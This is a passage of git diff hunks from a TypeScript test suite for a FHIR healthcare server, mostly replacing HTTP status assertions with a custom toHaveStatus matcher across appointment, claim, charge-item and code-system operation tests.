     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
   });
 
   test('Returns cancelled appointment', async () => {
@@ -104,7 +104,7 @@ describe('Appointment/$cancel', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
 
     const updated = response.body as Appointment;
     expect(updated).toMatchObject({ resourceType: 'Appointment', id: appointment.id, status: 'cancelled' });
@@ -119,7 +119,7 @@ describe('Appointment/$cancel', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
 
     const remaining = await systemRepo.searchResources<Slot>(parseSearchRequest(`Slot?_id=${slot.id}`));
     expect(remaining).toHaveLength(0);
@@ -135,7 +135,7 @@ describe('Appointment/$cancel', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
 
     const remaining = await systemRepo.searchResources<Slot>(parseSearchRequest(`Slot?_id=${slot1.id},${slot2.id}`));
     expect(remaining).toHaveLength(0);
@@ -149,7 +149,7 @@ describe('Appointment/$cancel', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
   });
 
   test.each(['cancelled', 'fulfilled', 'noshow', 'entered-in-error'] as Appointment['status'][])(
@@ -171,7 +171,7 @@ describe('Appointment/$cancel', () => {
           },
         ],
       });
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
     }
   );
 
@@ -180,7 +180,7 @@ describe('Appointment/$cancel', () => {
       .post('/fhir/R4/Appointment/00000000-0000-0000-0000-000000000000/$cancel')
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(404);
+    expect(response).toHaveStatus(404);
   });
 
   test('Returns 400 when a referenced slot does not exist', async () => {
@@ -198,7 +198,7 @@ describe('Appointment/$cancel', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$cancel`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [{ severity: 'error', code: 'invalid', details: { text: 'Loading slots failed' } }],

--- a/packages/server/src/fhir/operations/cancel.test.ts
+++ b/packages/server/src/fhir/operations/cancel.test.ts
@@ -79,7 +79,6 @@ describe('Appointment/$cancel', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$cancel`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
   });
 
@@ -91,7 +90,6 @@ describe('Appointment/$cancel', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$cancel`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
   });
 
@@ -103,7 +101,6 @@ describe('Appointment/$cancel', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$cancel`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
 
     const updated = response.body as Appointment;
@@ -118,7 +115,6 @@ describe('Appointment/$cancel', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$cancel`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
 
     const remaining = await systemRepo.searchResources<Slot>(parseSearchRequest(`Slot?_id=${slot.id}`));
@@ -134,7 +130,6 @@ describe('Appointment/$cancel', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$cancel`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
 
     const remaining = await systemRepo.searchResources<Slot>(parseSearchRequest(`Slot?_id=${slot1.id},${slot2.id}`));
@@ -148,7 +143,6 @@ describe('Appointment/$cancel', () => {
       .post(`/fhir/R4/Appointment/${appointment.id}/$cancel`)
       .set('Authorization', `Bearer ${project.accessToken}`);
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(200);
   });
 

--- a/packages/server/src/fhir/operations/ccdaexport.test.ts
+++ b/packages/server/src/fhir/operations/ccdaexport.test.ts
@@ -31,7 +31,7 @@ describe('C-CDA Export', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Organization' });
-    expect(orgRes.status).toBe(201);
+    expect(orgRes).toHaveStatus(201);
     const organization = orgRes.body as Organization;
 
     // Create practitioner
@@ -40,7 +40,7 @@ describe('C-CDA Export', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Practitioner' });
-    expect(practRes.status).toBe(201);
+    expect(practRes).toHaveStatus(201);
     const practitioner = practRes.body as Practitioner;
 
     // Create patient
@@ -58,7 +58,7 @@ describe('C-CDA Export', () => {
         ],
         managingOrganization: createReference(organization),
       } satisfies Patient);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const patient = res1.body as Patient;
 
     // Create observation
@@ -75,7 +75,7 @@ describe('C-CDA Export', () => {
         performer: [createReference(practitioner), createReference(organization)],
         effectiveDateTime: new Date().toISOString(),
       } satisfies Observation);
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     const observation = res2.body as WithId<Observation>;
 
     // Create condition
@@ -93,7 +93,7 @@ describe('C-CDA Export', () => {
         recorder: createReference(practitioner),
         recordedDate: new Date().toISOString(),
       } satisfies Condition);
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
     const condition = res3.body as WithId<Condition>;
 
     // Execute the operation
@@ -101,7 +101,7 @@ describe('C-CDA Export', () => {
       .get(`/fhir/R4/Patient/${patient.id}/$ccda-export`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', ContentType.CDA_XML);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     const result = res4.text;
     expect(result.includes('<given>Alice</given>')).toBe(true);

--- a/packages/server/src/fhir/operations/chargeitemdefinitionapply.test.ts
+++ b/packages/server/src/fhir/operations/chargeitemdefinitionapply.test.ts
@@ -32,7 +32,7 @@ describe('ChargeItemDefinition Apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Test'], family: 'Patient' }],
       });
-    expect(patient.status).toBe(201);
+    expect(patient).toHaveStatus(201);
 
     // 2. Create an encounter
     const encounter = await request(app)
@@ -51,7 +51,7 @@ describe('ChargeItemDefinition Apply', () => {
           reference: `Patient/${patient.body.id}`,
         },
       });
-    expect(encounter.status).toBe(201);
+    expect(encounter).toHaveStatus(201);
 
     // 3. Create a ChargeItemDefinition
     const chargeItemDefinition = await request(app)
@@ -86,7 +86,7 @@ describe('ChargeItemDefinition Apply', () => {
         ],
       });
 
-    expect(chargeItemDefinition.status).toBe(201);
+    expect(chargeItemDefinition).toHaveStatus(201);
 
     // 4. Create a draft ChargeItem first
     const draftChargeItem = await request(app)
@@ -116,7 +116,7 @@ describe('ChargeItemDefinition Apply', () => {
           ],
         },
       });
-    expect(draftChargeItem.status).toBe(201);
+    expect(draftChargeItem).toHaveStatus(201);
 
     // 5. Apply the ChargeItemDefinition to the draft ChargeItem using its reference
     const applyResult = await request(app)
@@ -136,7 +136,7 @@ describe('ChargeItemDefinition Apply', () => {
       });
 
     // 6. Verify the result
-    expect(applyResult.status).toBe(200);
+    expect(applyResult).toHaveStatus(200);
     const chargeItem = applyResult.body as ChargeItem;
     expect(chargeItem.resourceType).toBe('ChargeItem');
     expect(chargeItem.id).toBe(draftChargeItem.body.id);
@@ -162,7 +162,7 @@ describe('ChargeItemDefinition Apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Service'], family: 'CodeTest' }],
       });
-    expect(patient.status).toBe(201);
+    expect(patient).toHaveStatus(201);
 
     // 2. Create an encounter
     const encounter = await request(app)
@@ -181,7 +181,7 @@ describe('ChargeItemDefinition Apply', () => {
           reference: `Patient/${patient.body.id}`,
         },
       });
-    expect(encounter.status).toBe(201);
+    expect(encounter).toHaveStatus(201);
 
     // 3. Create a ChargeItemDefinition with code-specific surcharge
     const chargeItemDefinitionBody: ChargeItemDefinition = {
@@ -258,7 +258,7 @@ describe('ChargeItemDefinition Apply', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(chargeItemDefinitionBody);
-    expect(chargeItemDefinition.status).toBe(201);
+    expect(chargeItemDefinition).toHaveStatus(201);
 
     // 4. Create a draft ChargeItem with 99214 code
     const draftChargeItem = await request(app)
@@ -288,7 +288,7 @@ describe('ChargeItemDefinition Apply', () => {
           ],
         },
       });
-    expect(draftChargeItem.status).toBe(201);
+    expect(draftChargeItem).toHaveStatus(201);
 
     // 5. Apply the ChargeItemDefinition to the draft ChargeItem
     const applyResult = await request(app)
@@ -308,7 +308,7 @@ describe('ChargeItemDefinition Apply', () => {
       });
 
     // 6. Verify the result
-    expect(applyResult.status).toBe(200);
+    expect(applyResult).toHaveStatus(200);
     const chargeItem = applyResult.body as ChargeItem;
     expect(chargeItem.resourceType).toBe('ChargeItem');
     expect(chargeItem.id).toBe(draftChargeItem.body.id);
@@ -333,7 +333,7 @@ describe('ChargeItemDefinition Apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Discount'], family: 'TestCase' }],
       });
-    expect(patient.status).toBe(201);
+    expect(patient).toHaveStatus(201);
 
     // 2. Create an encounter
     const encounter = await request(app)
@@ -352,7 +352,7 @@ describe('ChargeItemDefinition Apply', () => {
           reference: `Patient/${patient.body.id}`,
         },
       });
-    expect(encounter.status).toBe(201);
+    expect(encounter).toHaveStatus(201);
 
     // 3. Create a ChargeItemDefinition with various discount types
     const chargeItemDefinitionBody: ChargeItemDefinition = {
@@ -447,7 +447,7 @@ describe('ChargeItemDefinition Apply', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(chargeItemDefinitionBody);
-    expect(chargeItemDefinition.status).toBe(201);
+    expect(chargeItemDefinition).toHaveStatus(201);
 
     // 4. Create a draft ChargeItem
     const draftChargeItem = await request(app)
@@ -477,7 +477,7 @@ describe('ChargeItemDefinition Apply', () => {
           ],
         },
       });
-    expect(draftChargeItem.status).toBe(201);
+    expect(draftChargeItem).toHaveStatus(201);
 
     // 5. Apply the ChargeItemDefinition to the draft ChargeItem
     const applyResult = await request(app)
@@ -497,7 +497,7 @@ describe('ChargeItemDefinition Apply', () => {
       });
 
     // 6. Verify the result
-    expect(applyResult.status).toBe(200);
+    expect(applyResult).toHaveStatus(200);
     const chargeItem = applyResult.body as ChargeItem;
     expect(chargeItem.resourceType).toBe('ChargeItem');
     expect(chargeItem.id).toBe(draftChargeItem.body.id);
@@ -523,7 +523,7 @@ describe('ChargeItemDefinition Apply', () => {
         resourceType: 'Patient',
         name: [{ given: ['Base'], family: 'Applicability' }],
       });
-    expect(patient.status).toBe(201);
+    expect(patient).toHaveStatus(201);
 
     // Create an encounter
     const encounter = await request(app)
@@ -542,7 +542,7 @@ describe('ChargeItemDefinition Apply', () => {
           reference: `Patient/${patient.body.id}`,
         },
       });
-    expect(encounter.status).toBe(201);
+    expect(encounter).toHaveStatus(201);
 
     // Create a ChargeItemDefinition with base price applicability
     const chargeItemDefinitionBody: ChargeItemDefinition = {
@@ -621,7 +621,7 @@ describe('ChargeItemDefinition Apply', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(chargeItemDefinitionBody);
-    expect(chargeItemDefinition.status).toBe(201);
+    expect(chargeItemDefinition).toHaveStatus(201);
 
     // Create a ChargeItem for a new patient
     const newPatientChargeItem = await request(app)
@@ -651,7 +651,7 @@ describe('ChargeItemDefinition Apply', () => {
           ],
         },
       });
-    expect(newPatientChargeItem.status).toBe(201);
+    expect(newPatientChargeItem).toHaveStatus(201);
 
     // Apply the ChargeItemDefinition to the new patient ChargeItem
     const newPatientApplyResult = await request(app)
@@ -671,7 +671,7 @@ describe('ChargeItemDefinition Apply', () => {
       });
 
     // Verify new patient pricing
-    expect(newPatientApplyResult.status).toBe(200);
+    expect(newPatientApplyResult).toHaveStatus(200);
     const newPatientResult = newPatientApplyResult.body as ChargeItem;
     expect(newPatientResult.resourceType).toBe('ChargeItem');
     expect(newPatientResult.id).toBe(newPatientChargeItem.body.id);
@@ -711,7 +711,7 @@ describe('ChargeItemDefinition Apply', () => {
           ],
         },
       });
-    expect(establishedPatientChargeItem.status).toBe(201);
+    expect(establishedPatientChargeItem).toHaveStatus(201);
 
     // Apply the ChargeItemDefinition to the established patient ChargeItem
     const establishedPatientApplyResult = await request(app)
@@ -731,7 +731,7 @@ describe('ChargeItemDefinition Apply', () => {
       });
 
     // Verify established patient pricing
-    expect(establishedPatientApplyResult.status).toBe(200);
+    expect(establishedPatientApplyResult).toHaveStatus(200);
     const establishedPatientResult = establishedPatientApplyResult.body as ChargeItem;
 
     // Established Patient base price: $100
@@ -769,7 +769,7 @@ describe('ChargeItemDefinition Apply', () => {
           ],
         },
       });
-    expect(otherChargeItem.status).toBe(201);
+    expect(otherChargeItem).toHaveStatus(201);
 
     // Apply the ChargeItemDefinition to the other ChargeItem
     const otherApplyResult = await request(app)
@@ -788,7 +788,7 @@ describe('ChargeItemDefinition Apply', () => {
         ],
       });
 
-    expect(otherApplyResult.status).toBe(200);
+    expect(otherApplyResult).toHaveStatus(200);
     const otherResult = otherApplyResult.body as ChargeItem;
     expect(otherResult.priceOverride?.value).toBe(150);
     expect(otherResult.priceOverride?.currency).toBe('USD');

--- a/packages/server/src/fhir/operations/claimexport.test.ts
+++ b/packages/server/src/fhir/operations/claimexport.test.ts
@@ -27,7 +27,7 @@ describe('CMS 1500 PDF', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(fullAnswer);
-    expect(bundleRes.status).toBe(200);
+    expect(bundleRes).toHaveStatus(200);
     expect(bundleRes.body.resourceType).toBe('Bundle');
     expect(bundleRes.body.type).toBe('transaction-response');
 
@@ -35,7 +35,7 @@ describe('CMS 1500 PDF', () => {
       .get(`/fhir/R4/Claim?identifier=example-claim-cms1500`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', 'application/fhir+json');
-    expect(searchRes.status).toBe(200);
+    expect(searchRes).toHaveStatus(200);
     expect(searchRes.body.resourceType).toBe('Bundle');
     expect(searchRes.body.entry.length).toBeGreaterThan(0);
 
@@ -58,7 +58,7 @@ describe('CMS 1500 PDF', () => {
       });
 
     expect(response).toBeDefined();
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body.resourceType).toBe('Media');
     expect(response.body.content.contentType).toBe('application/pdf');
   });
@@ -69,7 +69,7 @@ describe('CMS 1500 PDF', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(fullAnswer);
-    expect(bundleRes.status).toBe(200);
+    expect(bundleRes).toHaveStatus(200);
     expect(bundleRes.body.resourceType).toBe('Bundle');
     expect(bundleRes.body.type).toBe('transaction-response');
 
@@ -77,7 +77,7 @@ describe('CMS 1500 PDF', () => {
       .get(`/fhir/R4/Claim?identifier=example-claim-cms1500`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', 'application/fhir+json');
-    expect(searchRes.status).toBe(200);
+    expect(searchRes).toHaveStatus(200);
     expect(searchRes.body.resourceType).toBe('Bundle');
     expect(searchRes.body.entry.length).toBeGreaterThan(0);
 
@@ -91,7 +91,7 @@ describe('CMS 1500 PDF', () => {
       .set('Accept', 'application/fhir+json');
 
     expect(response).toBeDefined();
-    expect(response.status).toBe(200);
+    expect(response).toHaveStatus(200);
     expect(response.body.resourceType).toBe('Media');
     expect(response.body.content.contentType).toBe('application/pdf');
   });
@@ -102,7 +102,7 @@ describe('CMS 1500 PDF', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', 'application/fhir+json');
 
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.resourceType).toBe('OperationOutcome');
     expect(response.body.issue[0].severity).toBe('error');
   });
@@ -117,7 +117,7 @@ describe('CMS 1500 PDF', () => {
         parameter: [{ name: 'resource' }],
       });
 
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.resourceType).toBe('OperationOutcome');
     expect(response.body.issue[0].severity).toBe('error');
   });

--- a/packages/server/src/fhir/operations/claimsubmit.test.ts
+++ b/packages/server/src/fhir/operations/claimsubmit.test.ts
@@ -79,7 +79,7 @@ async function deployClaimOperation(
     .set('Content-Type', ContentType.FHIR_JSON)
     .set('Authorization', 'Bearer ' + accessToken)
     .send({ resourceType: 'Bot', name: 'Claim Submit Bot', runtimeVersion: 'vmcontext' });
-  expect(res1.status).toBe(201);
+  expect(res1).toHaveStatus(201);
   const bot = res1.body as WithId<Bot>;
 
   const res2 = await request(app)
@@ -87,7 +87,7 @@ async function deployClaimOperation(
     .set('Content-Type', ContentType.FHIR_JSON)
     .set('Authorization', 'Bearer ' + accessToken)
     .send({ code: getClaimResponseBotCode(insurerDisplay) });
-  expect(res2.status).toBe(200);
+  expect(res2).toHaveStatus(200);
 
   const res3 = await request(app)
     .post('/fhir/R4/OperationDefinition')
@@ -111,7 +111,7 @@ async function deployClaimOperation(
       resource: ['Claim'],
       parameter: [{ use: 'out', name: 'return', type: 'ClaimResponse', min: 1, max: '1' }],
     });
-  expect(res3.status).toBe(201);
+  expect(res3).toHaveStatus(201);
 }
 
 function bodyWith(resource?: Bundle | Claim): object {
@@ -140,7 +140,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(bodyWith(minimalClaim));
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(JSON.stringify(res.body)).toMatch(/not configured/i);
   });
 
@@ -151,7 +151,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(bodyWith({ ...minimalClaim, use: 'preauthorization' }));
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(JSON.stringify(res.body)).toMatch(/PRIOR_AUTH_SUBMIT_OPERATION/);
   });
 
@@ -164,7 +164,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(bodyWith(minimalClaim));
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(JSON.stringify(res.body)).toMatch(/not available/i);
   });
 
@@ -178,7 +178,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(bodyWith(minimalClaim));
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     // A single 'return' output of a resource type is sent as the bare resource, not wrapped in Parameters.
     expect(res.body.resourceType).toBe('ClaimResponse');
     expect(res.body.outcome).toBe('complete');
@@ -194,7 +194,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(minimalClaim);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('ClaimResponse');
     expect(res.body.outcome).toBe('complete');
   });
@@ -211,7 +211,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(bodyWith({ ...minimalClaim, use: 'preauthorization' }));
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('ClaimResponse');
     expect(res.body.use).toBe('preauthorization');
     expect(res.body.insurer?.display).toBe('Prior Auth Payer');
@@ -238,7 +238,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(bundle);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('ClaimResponse');
     expect(res.body.insurer?.display).toBe('Prior Auth Payer');
   });
@@ -259,7 +259,7 @@ describe('Claim $submit', () => {
           entry: [{ resource: { resourceType: 'Patient', id: 'example' } }],
         })
       );
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(JSON.stringify(res.body)).toMatch(/Claim submit must contain at least one Claim resource/i);
   });
 
@@ -273,14 +273,14 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(minimalClaim);
-    expect(createRes.status).toBe(201);
+    expect(createRes).toHaveStatus(201);
     const claimId = createRes.body.id;
 
     const res = await request(app)
       .post(`/fhir/R4/Claim/${claimId}/$submit`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', 'application/fhir+json');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('ClaimResponse');
     // Confirms the Claim read from the URL was forwarded to the bot as the body.
     expect(res.body.patient?.reference).toBe('Patient/example');
@@ -296,7 +296,7 @@ describe('Claim $submit', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/fhir+json')
       .send(bodyWith());
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.resourceType).toBe('OperationOutcome');
     expect(res.body.issue[0].severity).toBe('error');
   });

--- a/packages/server/src/fhir/operations/clearallwssubs.test.ts
+++ b/packages/server/src/fhir/operations/clearallwssubs.test.ts
@@ -31,7 +31,7 @@ describe('$clear-all-ws-subs', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Rejects invalid projectId', async () => {
@@ -46,7 +46,7 @@ describe('$clear-all-ws-subs', () => {
         parameter: [{ name: 'projectId', valueString: 'not-a-uuid' }],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Clears all WS subscription hashes, cache entries, and user keys', async () => {
@@ -96,7 +96,7 @@ describe('$clear-all-ws-subs', () => {
       .type('json')
       .send({});
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expect(await pubSubRedis.exists(getActiveSubsKey(projectId, 'Observation'))).toBe(0);
     expect(await pubSubRedis.exists(getActiveSubsKey(projectId, 'Patient'))).toBe(0);
@@ -166,7 +166,7 @@ describe('$clear-all-ws-subs', () => {
           parameter: [{ name: 'projectId', valueString: projectId1 }],
         });
 
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       expect(await pubSubRedis.exists(getActiveSubsKey(projectId1, 'Observation'))).toBe(0);
       expect(await cacheRedis.exists(`Subscription/${sub1Id}`)).toBe(0);

--- a/packages/server/src/fhir/operations/codesystemimport.test.ts
+++ b/packages/server/src/fhir/operations/codesystemimport.test.ts
@@ -51,14 +51,14 @@ describe('CodeSystem $import', () => {
       .get(`/fhir/R4/CodeSystem?url=${snomedJSON.url}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(resS.status).toStrictEqual(200);
+    expect(resS).toHaveStatus(200);
 
     for (const entry of resS.body.entry ?? EMPTY) {
       const resD = await request(app)
         .delete(`/fhir/R4/CodeSystem/${entry.resource.id}`)
         .set('Authorization', 'Bearer ' + accessToken)
         .send();
-      expect(resD.status).toStrictEqual(200);
+      expect(resD).toHaveStatus(200);
     }
 
     const res = await request(app)
@@ -66,7 +66,7 @@ describe('CodeSystem $import', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(snomedJSON);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     snomed = res.body as CodeSystem;
   });
 
@@ -87,7 +87,7 @@ describe('CodeSystem $import', () => {
           { name: 'concept', valueCoding: { code: '315306007', display: 'Examination by method (procedure)' } },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app)
       .post(`/fhir/R4/CodeSystem/$import`)
@@ -107,7 +107,7 @@ describe('CodeSystem $import', () => {
           },
         ],
       });
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
 
     const coding = await assertCodeExists(snomed.id, '37931006');
     expect(coding.isSynonym).toBe(false);
@@ -154,7 +154,7 @@ describe('CodeSystem $import', () => {
           },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     await assertCodeExists(snomed.id, '702707005');
     const target = await assertCodeExists(snomed.id, '118690002');
@@ -174,7 +174,7 @@ describe('CodeSystem $import', () => {
           { name: 'concept', valueCoding: { code: '1', display: 'Aspirin' } },
         ],
       });
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].code).toStrictEqual('invalid');
   });
 
@@ -197,7 +197,7 @@ describe('CodeSystem $import', () => {
           },
         ],
       });
-    expect(res2.status).toStrictEqual(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].code).toStrictEqual('invalid');
   });
 
@@ -221,7 +221,7 @@ describe('CodeSystem $import', () => {
           },
         ],
       });
-    expect(res2.status).toStrictEqual(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].code).toStrictEqual('invalid');
   });
 
@@ -238,7 +238,7 @@ describe('CodeSystem $import', () => {
           { name: 'concept', valueCoding: { code: '184598004', display: 'Needle biopsy of brain (procedure)' } },
         ],
       });
-    expect(res2.status).toStrictEqual(403);
+    expect(res2).toHaveStatus(403);
     expect(res2.body.issue[0].code).toStrictEqual('forbidden');
   });
 
@@ -255,7 +255,7 @@ describe('CodeSystem $import', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(snomedJSON);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
 
     const res2 = await request(app)
       .post(`/fhir/R4/CodeSystem/$import`)
@@ -268,7 +268,7 @@ describe('CodeSystem $import', () => {
           { name: 'concept', valueCoding: { code: '184598004', display: 'Needle biopsy of brain (procedure)' } },
         ],
       });
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     await assertCodeExists(res.body.id, '184598004');
   });
 
@@ -290,7 +290,7 @@ describe('CodeSystem $import', () => {
           { name: 'concept', valueCoding: { code: 'NIBL', display: 'nibling' } },
         ],
       });
-    expect(res2.status).toStrictEqual(400);
+    expect(res2).toHaveStatus(400);
   });
 
   test('Imports concepts and synonym designations', async () => {
@@ -320,7 +320,7 @@ describe('CodeSystem $import', () => {
           },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
 
     const coding = await assertCodeExists(snomed.id, '37931006');
     expect(coding.isSynonym).toBe(false);
@@ -345,7 +345,7 @@ describe('CodeSystem $import', () => {
           },
         ],
       });
-    expect(resCreate.status).toStrictEqual(200);
+    expect(resCreate).toHaveStatus(200);
 
     const resUpsert = await request(app)
       .post(`/fhir/R4/CodeSystem/$import`)
@@ -358,7 +358,7 @@ describe('CodeSystem $import', () => {
           { name: 'concept', valueCoding: { code: '12345', display: 'Test code' } },
         ],
       });
-    expect(resUpsert.status).toStrictEqual(200);
+    expect(resUpsert).toHaveStatus(200);
 
     const resProperty = await request(app)
       .post(`/fhir/R4/CodeSystem/$import`)
@@ -378,7 +378,7 @@ describe('CodeSystem $import', () => {
           },
         ],
       });
-    expect(resProperty.status).toStrictEqual(200);
+    expect(resProperty).toHaveStatus(200);
 
     const coding = await assertCodeExists(snomed.id, '12345');
     const result = await assertPropertyExists(snomed.id, '12345', 'parent', '98765');
@@ -401,7 +401,7 @@ describe('CodeSystem $import', () => {
           ],
         },
       });
-    expect(resValueSet.status).toStrictEqual(201);
+    expect(resValueSet).toHaveStatus(201);
     const valueSet = resValueSet.body as ValueSet;
 
     const resExpand = await request(app)
@@ -409,7 +409,7 @@ describe('CodeSystem $import', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send();
-    expect(resExpand.status).toStrictEqual(200);
+    expect(resExpand).toHaveStatus(200);
     const expanded = resExpand.body as ValueSet;
     expect(expanded.expansion?.contains).toHaveLength(1);
   });

--- a/packages/server/src/fhir/operations/codesystemlookup.test.ts
+++ b/packages/server/src/fhir/operations/codesystemlookup.test.ts
@@ -90,7 +90,7 @@ describe('CodeSystem lookup', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(testCodeSystem);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     codeSystem = res.body as CodeSystem;
   });
 
@@ -110,7 +110,7 @@ describe('CodeSystem lookup', () => {
           { name: 'code', valueCode: '1' },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject<Parameters>({
       resourceType: 'Parameters',
       parameter: [
@@ -140,7 +140,7 @@ describe('CodeSystem lookup', () => {
           { name: 'code', valueCode: '2' },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
